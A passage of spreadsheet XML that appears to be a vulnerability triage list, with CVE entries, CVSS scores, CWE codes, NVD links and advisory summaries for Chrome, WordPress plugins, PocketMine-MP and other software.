          <t>CWE-295</t>
        </is>
      </c>
      <c r="R952" s="5" t="inlineStr">
        <is>
          <t>Improper certificate validation in Loader in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass web origin policy via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87571</t>
        </is>
      </c>
    </row>
    <row r="953">
      <c r="A953" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B953" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87575</t>
        </is>
      </c>
      <c r="D953" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E953" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F953" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G953" s="5" t="inlineStr"/>
      <c r="H953" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I953" s="5" t="inlineStr"/>
      <c r="J953" s="5" t="inlineStr"/>
      <c r="K953" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L953" s="5" t="inlineStr"/>
      <c r="M953" s="5" t="inlineStr"/>
      <c r="N953" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O953" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P953" s="5" t="inlineStr"/>
      <c r="Q953" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R953" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Loader in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87575</t>
        </is>
      </c>
    </row>
    <row r="954">
      <c r="A954" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B954" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87583</t>
        </is>
      </c>
      <c r="D954" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E954" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F954" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G954" s="5" t="inlineStr"/>
      <c r="H954" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I954" s="5" t="inlineStr"/>
      <c r="J954" s="5" t="inlineStr"/>
      <c r="K954" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L954" s="5" t="inlineStr"/>
      <c r="M954" s="5" t="inlineStr"/>
      <c r="N954" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O954" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P954" s="5" t="inlineStr"/>
      <c r="Q954" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="R954" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Passwords in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to spoof UI elements via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87583</t>
        </is>
      </c>
    </row>
    <row r="955">
      <c r="A955" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B955" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87599</t>
        </is>
      </c>
      <c r="D955" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E955" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F955" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G955" s="5" t="inlineStr"/>
      <c r="H955" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I955" s="5" t="inlineStr"/>
      <c r="J955" s="5" t="inlineStr"/>
      <c r="K955" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L955" s="5" t="inlineStr"/>
      <c r="M955" s="5" t="inlineStr"/>
      <c r="N955" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O955" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P955" s="5" t="inlineStr"/>
      <c r="Q955" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R955" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Interstitials in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87599</t>
        </is>
      </c>
    </row>
    <row r="956">
      <c r="A956" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B956" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87615</t>
        </is>
      </c>
      <c r="D956" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E956" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F956" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G956" s="5" t="inlineStr"/>
      <c r="H956" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I956" s="5" t="inlineStr"/>
      <c r="J956" s="5" t="inlineStr"/>
      <c r="K956" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L956" s="5" t="inlineStr"/>
      <c r="M956" s="5" t="inlineStr"/>
      <c r="N956" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O956" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P956" s="5" t="inlineStr"/>
      <c r="Q956" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R956" s="5" t="inlineStr">
        <is>
          <t>Race condition in Payments in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87615</t>
        </is>
      </c>
    </row>
    <row r="957">
      <c r="A957" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B957" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87635</t>
        </is>
      </c>
      <c r="D957" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E957" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F957" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G957" s="5" t="inlineStr"/>
      <c r="H957" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I957" s="5" t="inlineStr"/>
      <c r="J957" s="5" t="inlineStr"/>
      <c r="K957" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L957" s="5" t="inlineStr"/>
      <c r="M957" s="5" t="inlineStr"/>
      <c r="N957" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O957" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P957" s="5" t="inlineStr"/>
      <c r="Q957" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="R957" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Payments in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87635</t>
        </is>
      </c>
    </row>
    <row r="958">
      <c r="A958" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B958" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87645</t>
        </is>
      </c>
      <c r="D958" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E958" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F958" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G958" s="5" t="inlineStr"/>
      <c r="H958" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I958" s="5" t="inlineStr"/>
      <c r="J958" s="5" t="inlineStr"/>
      <c r="K958" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L958" s="5" t="inlineStr"/>
      <c r="M958" s="5" t="inlineStr"/>
      <c r="N958" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O958" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P958" s="5" t="inlineStr"/>
      <c r="Q958" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="R958" s="5" t="inlineStr">
        <is>
          <t>Improper state validation in Safebrowsing in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87645</t>
        </is>
      </c>
    </row>
    <row r="959">
      <c r="A959" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B959" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87649</t>
        </is>
      </c>
      <c r="D959" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E959" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F959" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G959" s="5" t="inlineStr"/>
      <c r="H959" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I959" s="5" t="inlineStr"/>
      <c r="J959" s="5" t="inlineStr"/>
      <c r="K959" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L959" s="5" t="inlineStr"/>
      <c r="M959" s="5" t="inlineStr"/>
      <c r="N959" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O959" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P959" s="5" t="inlineStr"/>
      <c r="Q959" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="R959" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Downloads in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87649</t>
        </is>
      </c>
    </row>
    <row r="960">
      <c r="A960" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B960" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87653</t>
        </is>
      </c>
      <c r="D960" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E960" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F960" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G960" s="5" t="inlineStr"/>
      <c r="H960" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I960" s="5" t="inlineStr"/>
      <c r="J960" s="5" t="inlineStr"/>
      <c r="K960" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L960" s="5" t="inlineStr"/>
      <c r="M960" s="5" t="inlineStr"/>
      <c r="N960" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O960" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P960" s="5" t="inlineStr"/>
      <c r="Q960" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="R960" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in FullScreen in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to spoof UI elements via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87653</t>
        </is>
      </c>
    </row>
    <row r="961">
      <c r="A961" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B961" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87655</t>
        </is>
      </c>
      <c r="D961" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E961" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F961" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G961" s="5" t="inlineStr"/>
      <c r="H961" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I961" s="5" t="inlineStr"/>
      <c r="J961" s="5" t="inlineStr"/>
      <c r="K961" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L961" s="5" t="inlineStr"/>
      <c r="M961" s="5" t="inlineStr"/>
      <c r="N961" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O961" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P961" s="5" t="inlineStr"/>
      <c r="Q961" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="R961" s="5" t="inlineStr">
        <is>
          <t>Clickjacking in Downloads in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87655</t>
        </is>
      </c>
    </row>
    <row r="962">
      <c r="A962" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B962" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87656</t>
        </is>
      </c>
      <c r="D962" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E962" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F962" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G962" s="5" t="inlineStr"/>
      <c r="H962" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I962" s="5" t="inlineStr"/>
      <c r="J962" s="5" t="inlineStr"/>
      <c r="K962" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L962" s="5" t="inlineStr"/>
      <c r="M962" s="5" t="inlineStr"/>
      <c r="N962" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O962" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P962" s="5" t="inlineStr"/>
      <c r="Q962" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="R962" s="5" t="inlineStr">
        <is>
          <t>Improper state validation in Safebrowsing in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87656</t>
        </is>
      </c>
    </row>
    <row r="963">
      <c r="A963" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B963" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87928</t>
        </is>
      </c>
      <c r="D963" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E963" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F963" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G963" s="5" t="inlineStr"/>
      <c r="H963" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I963" s="5" t="inlineStr"/>
      <c r="J963" s="5" t="inlineStr"/>
      <c r="K963" s="5" t="inlineStr"/>
      <c r="L963" s="5" t="inlineStr"/>
      <c r="M963" s="5" t="inlineStr"/>
      <c r="N963" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O963" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P963" s="5" t="inlineStr"/>
      <c r="Q963" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R963" s="5" t="inlineStr">
        <is>
          <t>MaxSite CMS versions 0.94 through 109.6 contain a cross-site scripting vulnerability in the admin_page upload handler that allows any logged-in user to upload HTML files. Attackers can upload HTML containing malicious scripts to the uploads/_pages/ directory, which executes in visitors' browsers when the file is accessed, enabling persistent stored cross-site scripting attacks.</t>
        </is>
      </c>
      <c r="S963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87928</t>
        </is>
      </c>
    </row>
    <row r="964">
      <c r="A964" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B964" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C964" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54394</t>
        </is>
      </c>
      <c r="D964" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E964" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F964" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G964" s="5" t="inlineStr"/>
      <c r="H964" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I964" s="5" t="inlineStr"/>
      <c r="J964" s="5" t="inlineStr"/>
      <c r="K964" s="5" t="inlineStr"/>
      <c r="L964" s="5" t="inlineStr"/>
      <c r="M964" s="5" t="inlineStr"/>
      <c r="N964" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O964" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P964" s="5" t="inlineStr"/>
      <c r="Q964" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R964" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 4.18.0-ALPHA2 fails to rate-limit mismatch type InventoryTransactionPacket requests, allowing attackers to trigger excessive inventory synchronization. Attackers can send numerous mismatch transactions to force the server to transmit large amounts of serialized inventory data, consuming significant bandwidth without authentication.</t>
        </is>
      </c>
      <c r="S964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54394</t>
        </is>
      </c>
    </row>
    <row r="965">
      <c r="A965" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B965" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C965" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54395</t>
        </is>
      </c>
      <c r="D965" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E965" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F965" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G965" s="5" t="inlineStr"/>
      <c r="H965" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I965" s="5" t="inlineStr"/>
      <c r="J965" s="5" t="inlineStr"/>
      <c r="K965" s="5" t="inlineStr"/>
      <c r="L965" s="5" t="inlineStr"/>
      <c r="M965" s="5" t="inlineStr"/>
      <c r="N965" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O965" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P965" s="5" t="inlineStr"/>
      <c r="Q965" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R965" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.12.5 contain a denial-of-service vulnerability in ModalFormResponsePacket processing that allows attackers to cause server resource exhaustion by sending large JSON payloads. Attackers can send numerous oversized modal form response packets to consume CPU time and prevent the server from processing legitimate connections.</t>
        </is>
      </c>
      <c r="S965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54395</t>
        </is>
      </c>
    </row>
    <row r="966">
      <c r="A966" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B966" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12956</t>
        </is>
      </c>
      <c r="D966" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E966" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F966" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G966" s="5" t="inlineStr"/>
      <c r="H966" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I966" s="5" t="inlineStr"/>
      <c r="J966" s="5" t="inlineStr"/>
      <c r="K966" s="5" t="inlineStr"/>
      <c r="L966" s="5" t="inlineStr"/>
      <c r="M966" s="5" t="inlineStr"/>
      <c r="N966" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O966" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P966" s="5" t="inlineStr"/>
      <c r="Q966" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R966" s="5" t="inlineStr">
        <is>
          <t>The WP Event Solution (Eventin) plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 4.1.22 via the create_item() handler for the /wp-json/eventin/v2/orders REST endpoint. The endpoint's create_item_permissions_check() function only verifies a wp_rest nonce (which is leaked to every visitor through the etn-public script's localized_data_obj on every frontend page) and accepts a user-supplied 'status' value in prepare_item_for_database() with no whitelist validation. This makes it possible for unauthenticated attackers to create etn-order posts with status='completed' that are counted as sold by etn_get_sold_tickets_by_event(); because the auto-cleanup wp_schedule_single_event() in create_item() only fires for status='pending' orders, the forged completed orders persist indefinitely and exhaust ticket inventory.</t>
        </is>
      </c>
      <c r="S966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12956</t>
        </is>
      </c>
    </row>
    <row r="967">
      <c r="A967" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B967" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18042</t>
        </is>
      </c>
      <c r="D967" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E967" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F967" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G967" s="5" t="inlineStr"/>
      <c r="H967" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I967" s="5" t="inlineStr"/>
      <c r="J967" s="5" t="inlineStr"/>
      <c r="K967" s="5" t="inlineStr"/>
      <c r="L967" s="5" t="inlineStr"/>
      <c r="M967" s="5" t="inlineStr"/>
      <c r="N967" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O967" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P967" s="5" t="inlineStr"/>
      <c r="Q967" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R967" s="5" t="inlineStr">
        <is>
          <t>The WP Travel  WordPress plugin before 12.0.2 does not verify that the requester is authorized to act on the booking targeted by one of its front-end payment-message handlers, allowing unauthenticated attackers to cancel the payment on any customer's booking.</t>
        </is>
      </c>
      <c r="S967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18042</t>
        </is>
      </c>
    </row>
    <row r="968">
      <c r="A968" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B968" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19733</t>
        </is>
      </c>
      <c r="D968" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E968" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F968" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G968" s="5" t="inlineStr"/>
      <c r="H968" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I968" s="5" t="inlineStr"/>
      <c r="J968" s="5" t="inlineStr"/>
      <c r="K968" s="5" t="inlineStr"/>
      <c r="L968" s="5" t="inlineStr"/>
      <c r="M968" s="5" t="inlineStr"/>
      <c r="N968" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O968" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P968" s="5" t="inlineStr"/>
      <c r="Q968" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R968" s="5" t="inlineStr">
        <is>
          <t>Server-Side request forgery (SSRF) vulnerability in Yordam Informatics Technology Consulting, Training, and Electronic Systems Industry and Trade Inc. Library Information and Document Automation Program allows Server Side Request Forgery.
This issue affects Library Information and Document Automation Program: before v22.2.</t>
        </is>
      </c>
      <c r="S968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19733</t>
        </is>
      </c>
    </row>
    <row r="969">
      <c r="A969" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B969" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20503</t>
        </is>
      </c>
      <c r="D969" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E969" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F969" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G969" s="5" t="inlineStr"/>
      <c r="H969" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I969" s="5" t="inlineStr"/>
      <c r="J969" s="5" t="inlineStr"/>
      <c r="K969" s="5" t="inlineStr">
        <is>
          <t>mediatek:mt2716, mediatek:mt2716_firmware, mediatek:mt2735, mediatek:mt2735_firmware, mediatek:mt2737, mediatek:mt2737_firmware, mediatek:mt6813, mediatek:mt6813_firmware, mediatek:mt6833, mediatek:mt6833_firmware</t>
        </is>
      </c>
      <c r="L969" s="5" t="inlineStr"/>
      <c r="M969" s="5" t="inlineStr"/>
